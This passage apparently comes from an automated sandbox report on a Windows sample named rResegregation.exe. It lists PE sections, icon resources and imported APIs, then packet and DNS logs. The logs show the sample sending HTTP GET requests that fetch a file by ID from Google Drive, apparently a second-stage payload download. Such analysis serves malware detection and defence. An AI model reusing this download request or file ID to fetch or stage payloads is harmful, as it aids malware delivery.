                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
                                                                .text   0x1000           0x5db6        0x5e00    f367801e476b699be2b532039e0b583c  False     0.6806848404255319   data       6.508470969322742  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata  0x7000           0x1246        0x1400    43fab6a80651bd97af8f34ecf44cd8ac  False     0.42734375           data       5.005029341587408  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data   0x9000           0x399038      0x400     29ebcbec0bd7bd0fecb3d2937195c560  unknown   unknown              unknown    unknown            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata  0x3a3000         0x1d000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc   0x3c0000         0x2b038       0x2b200   9778d093a419153a5e6a05c46a1f4faa  False     0.38580729166666666  data       4.808486494968782  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                Name           RVA       Size     Type                                                                                Language  Country        ZLIB Complexity
                                                                RT_ICON        0x3c0448  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 67584                 English   United States  0.3347480184549864
                                                                RT_ICON        0x3d0c70  0x94a8   Device independent bitmap graphic, 96 x 192 x 32, image size 38016                  English   United States  0.4008040782005466
                                                                RT_ICON        0x3da118  0x5488   Device independent bitmap graphic, 72 x 144 x 32, image size 21600                  English   United States  0.41899260628465806
                                                                RT_ICON        0x3df5a0  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16896                  English   United States  0.40257439773264053
                                                                RT_ICON        0x3e37c8  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9600                    English   United States  0.45643153526970953
                                                                RT_ICON        0x3e5d70  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4224                    English   United States  0.4978893058161351
                                                                RT_ICON        0x3e6e18  0xea8    Device independent bitmap graphic, 48 x 96 x 8, image size 2688                     English   United States  0.5407782515991472
                                                                RT_ICON        0x3e7cc0  0x988    Device independent bitmap graphic, 24 x 48 x 32, image size 2400                    English   United States  0.5545081967213115
                                                                RT_ICON        0x3e8648  0x8a8    Device independent bitmap graphic, 32 x 64 x 8, image size 1152                     English   United States  0.5424187725631769
                                                                RT_ICON        0x3e8ef0  0x748    Device independent bitmap graphic, 24 x 48 x 24, image size 1824                    English   United States  0.5359442060085837
                                                                RT_ICON        0x3e9638  0x6c8    Device independent bitmap graphic, 24 x 48 x 8, image size 672                      English   United States  0.4925115207373272
                                                                RT_ICON        0x3e9d00  0x568    Device independent bitmap graphic, 16 x 32 x 8, image size 320                      English   United States  0.3627167630057804
                                                                RT_ICON        0x3ea268  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1088                    English   United States  0.598404255319149
                                                                RT_DIALOG      0x3ea6d0  0x100    data                                                                                English   United States  0.5234375
                                                                RT_DIALOG      0x3ea7d0  0x11c    data                                                                                English   United States  0.6056338028169014
                                                                RT_DIALOG      0x3ea8f0  0xc4     data                                                                                English   United States  0.5918367346938775
                                                                RT_DIALOG      0x3ea9b8  0x60     data                                                                                English   United States  0.7291666666666666
                                                                RT_GROUP_ICON  0x3eaa18  0xbc     data                                                                                English   United States  0.648936170212766
                                                                RT_VERSION     0x3eaad8  0x21c    data                                                                                English   United States  0.5203703703703704
                                                                RT_MANIFEST    0x3eacf8  0x33d    XML 1.0 document, ASCII text, with very long lines (829), with no line terminators  English   United States  0.5536791314837153
                                                                DLL           Import
                                                                KERNEL32.dll  SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                USER32.dll    ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                GDI32.dll     SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                SHELL32.dll   SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                ADVAPI32.dll  RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                COMCTL32.dll  ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                ole32.dll     OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                Language of compilation system  Country where language is spoken  Map
                                                                English                         United States
                                                                Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                Feb 28, 2024 13:26:22.222553015 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.222657919 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.222703934 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.223984003 CET50222443192.168.11.20172.217.12.142
                                                                Feb 28, 2024 13:26:22.224044085 CET44350222172.217.12.142192.168.11.20
                                                                Feb 28, 2024 13:26:22.438023090 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.438057899 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:22.438277006 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.438455105 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.438472986 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:22.769718885 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:22.769992113 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.769992113 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.775253057 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.775263071 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:22.775511980 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:22.775665045 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.776150942 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:22.816696882 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:23.941528082 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:23.941721916 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:23.941723108 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:23.951528072 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:23.951734066 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:23.951735020 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:23.951735020 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:23.973315954 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:23.973530054 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:23.973530054 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:23.973582029 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:23.984200001 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:23.984443903 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.097377062 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.097649097 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.097713947 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.097980976 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.102752924 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.102972984 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.103034019 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.103220940 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.113615036 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.113864899 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.113919020 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.114125967 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.124768019 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.125000000 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.125066042 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.125252962 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.135437012 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.135648966 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.135704994 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.135941029 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.146322012 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.146532059 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.146589041 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.146783113 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.157186031 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.157461882 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.157517910 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.157807112 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.168320894 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.168617964 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.168690920 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.168968916 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.178266048 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.178488016 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.178553104 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.178790092 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.188231945 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.188532114 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.188585043 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.188859940 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.197956085 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.198144913 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.198189020 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.198400021 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.207987070 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.208153963 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.208188057 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.208424091 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.217958927 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.218221903 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.222986937 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.223155975 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.223191023 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.223336935 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.223392010 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.223543882 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.253078938 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.253299952 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.253309965 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.253513098 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.257354021 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.257533073 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.257539988 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.257754087 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.266218901 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.266470909 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.266534090 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.267036915 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.273761988 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.274699926 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.274755955 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.275053024 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.281377077 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.281683922 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.281738043 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.282010078 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.288378954 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.288599968 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.288666010 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.288925886 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.288980961 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.289148092 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.295428991 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.295744896 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.295778990 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.296046972 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.302613974 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.302911043 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.302969933 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.303188086 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.309748888 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.309967995 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.310024023 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.310291052 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.316811085 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.317833900 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.317867041 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.318212032 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.323911905 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.324162960 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.324218035 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.324436903 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.331022978 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.331434011 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.334523916 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.334712029 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.334745884 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.334935904 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.341454029 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.341651917 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.341676950 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.341914892 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.348560095 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.348798990 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.348818064 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.349034071 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.355818987 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.356059074 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.356079102 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.356317043 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.362894058 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.363221884 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.363254070 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.363542080 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.369990110 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.370279074 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.370297909 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.370506048 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.376801014 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.377049923 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.377069950 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.377265930 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.383543968 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.383833885 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.383855104 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.384104967 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.390093088 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.390316963 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.390336990 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.390588999 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.396636963 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.396832943 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.396855116 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.397067070 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.403134108 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.403345108 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.403369904 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.403527975 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.409506083 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.409792900 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.409825087 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.410037994 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.415918112 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.416192055 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.419204950 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.419397116 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.419425011 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.419715881 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.425565958 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.425760984 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.425787926 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.425929070 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.429799080 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.430037022 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.430064917 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.430243969 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.433772087 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.433926105 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.433957100 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.434132099 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.437772989 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.438020945 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.438049078 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.438200951 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.441831112 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.442060947 CET50223443192.168.11.20142.250.72.225
                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Feb 28, 2024 13:26:21.329324961 CET | 54579 | 53 | 192.168.11.20 | 1.1.1.1
                                                                Feb 28, 2024 13:26:21.486140013 CET | 53 | 54579 | 1.1.1.1 | 192.168.11.20
                                                                Feb 28, 2024 13:26:22.272418022 CET | 56725 | 53 | 192.168.11.20 | 1.1.1.1
                                                                Feb 28, 2024 13:26:22.436706066 CET | 53 | 56725 | 1.1.1.1 | 192.168.11.20
                                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                Feb 28, 2024 13:26:21.329324961 CET | 192.168.11.20 | 1.1.1.1 | 0xfe1d | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                                                Feb 28, 2024 13:26:22.272418022 CET | 192.168.11.20 | 1.1.1.1 | 0xa222 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                Feb 28, 2024 13:26:21.486140013 CET | 1.1.1.1 | 192.168.11.20 | 0xfe1d | No error (0) | drive.google.com | | 172.217.12.142 | A (IP address) | IN (0x0001) | false
                                                                Feb 28, 2024 13:26:22.436706066 CET | 1.1.1.1 | 192.168.11.20 | 0xa222 | No error (0) | drive.usercontent.google.com | | 142.250.72.225 | A (IP address) | IN (0x0001) | false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.11.20 | 50222 | 172.217.12.142 | 443 | 5024 | C:\Users\user\Desktop\rResegregation.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-02-28 12:26:22 UTC | 216 | OUT | GET /uc?export=download&id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2024-02-28 12:26:22 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Wed, 28 Feb 2024 12:26:22 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-dbdk2SbPZA1qyVdbEom0Yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                1 | 192.168.11.20 | 50223 | 142.250.72.225 | 443 | 5024 | C:\Users\user\Desktop\rResegregation.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-02-28 12:26:22 UTC | 258 | OUT | GET /download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download HTTP/1.1
